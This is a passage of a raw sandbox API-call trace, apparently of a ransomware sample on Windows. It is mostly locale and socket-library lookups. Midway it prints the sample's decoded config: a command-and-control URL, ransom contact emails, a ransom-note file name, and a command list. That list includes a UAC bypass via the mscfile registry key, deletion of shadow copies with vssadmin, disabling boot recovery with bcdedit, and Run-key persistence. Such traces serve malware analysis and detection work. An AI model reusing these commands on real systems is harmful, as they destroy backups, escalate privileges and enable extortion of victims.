cchData=256 | out: lpLCData="Jun") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0093.949] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.949] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0093.949] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0093.953] GetProcAddress 
(hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0093.953] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0093.954] GetProcAddress 
(hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0093.954] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0093.955] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0093.960] GetACP () returned 0x4e4 [0093.960] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0093.960] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe")) returned 0x3a [0093.960] GetTickCount () returned 0x22c8b [0093.960] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=15074892729) returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6d\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x64\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x52\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x77\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4d\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x45\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x39\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x32\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x58\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x74\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: 
lpWideCharStr="\x56\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x37\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.960] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0093.960] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0093.960] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0093.960] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0093.960] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0093.960] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0093.960] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0093.960] LockResource (hResData=0x50d55c) returned 0x50d55c [0093.961] FreeResource (hResData=0x50d55c) returned 0 [0093.961] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.961] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.961] 
SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.961] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.961] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0093.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361c20, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361c20, cbMultiByte=38, lpWideCharStr=0x133de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.961] FreeResource (hResData=0x50d64c) returned 0 [0093.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1361c24, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.961] GetCurrentThreadId () returned 0xaf0 [0093.961] GetCurrentThreadId () returned 0xaf0 [0093.961] GetCurrentThreadId () returned 0xaf0 [0093.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x130a1a8, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0093.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x130a1a8, cbMultiByte=239, lpWideCharStr=0x130404c, cchWideChar=239 | out: 
lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0093.961] GetCurrentThreadId () returned 0xaf0 [0093.961] GetCurrentThreadId () returned 0xaf0 [0093.961] GetCurrentThreadId () returned 0xaf0 [0093.961] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0093.961] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x12faccc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0093.961] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x12faccc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0093.961] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0093.963] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0093.964] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0093.964] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0093.965] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0093.966] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0093.967] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=32, fCreate=0 | out: 
pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0093.967] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0093.976] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12face4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0093.977] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x12faccc, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0093.977] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x12faccc, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0093.977] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x12faccc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0093.977] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x12faccc, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0093.977] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0093.977] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0093.977] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0093.977] LockResource (hResData=0x50d72c) returned 0x50d72c [0093.978] FreeResource (hResData=0x50d72c) returned 0 [0093.978] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.978] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.978] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.978] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.978] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361cc8, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.978] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361cc8, cbMultiByte=38, lpWideCharStr=0x133deac, cchWideChar=38 | out: 
lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.978] FreeResource (hResData=0x50d64c) returned 0 [0093.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1361ccc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.978] GetCurrentThreadId () returned 0xaf0 [0093.978] GetCurrentThreadId () returned 0xaf0 [0093.978] GetCurrentThreadId () returned 0xaf0 [0093.978] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1300e48, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0093.978] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1300e48, cbMultiByte=1410, lpWideCharStr=0x12faccc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add 
\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0093.978] GetCurrentThreadId () returned 0xaf0 [0093.978] GetCurrentThreadId () returned 0xaf0 [0093.978] GetCurrentThreadId () returned 0xaf0 [0093.978] GetCurrentThread () returned 0xfffffffe [0093.978] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0093.978] GetLastError () returned 0x3f0 [0093.979] GetCurrentProcess () returned 0xffffffff [0093.979] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0093.979] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x12fee10, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x12fee10, ReturnLength=0x12fc60) returned 1 [0093.979] CloseHandle (hObject=0xb8) returned 1 [0093.979] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x1c6300*(Revision=0x1, SubAuthorityCount=0x2, 
IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0093.979] EqualSid (pSid1=0x1c6300*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x12fee74*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0093.979] EqualSid (pSid1=0x1c6300*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x12fee90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0093.979] EqualSid (pSid1=0x1c6300*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x12fee9c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0093.979] GetCurrentProcess () returned 0xffffffff [0093.979] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0093.979] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0093.979] GetLastError () returned 0x7a [0093.979] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x1c75a0 [0093.979] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x1c75a0, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x1c75a0, ReturnLength=0x12fc64) 
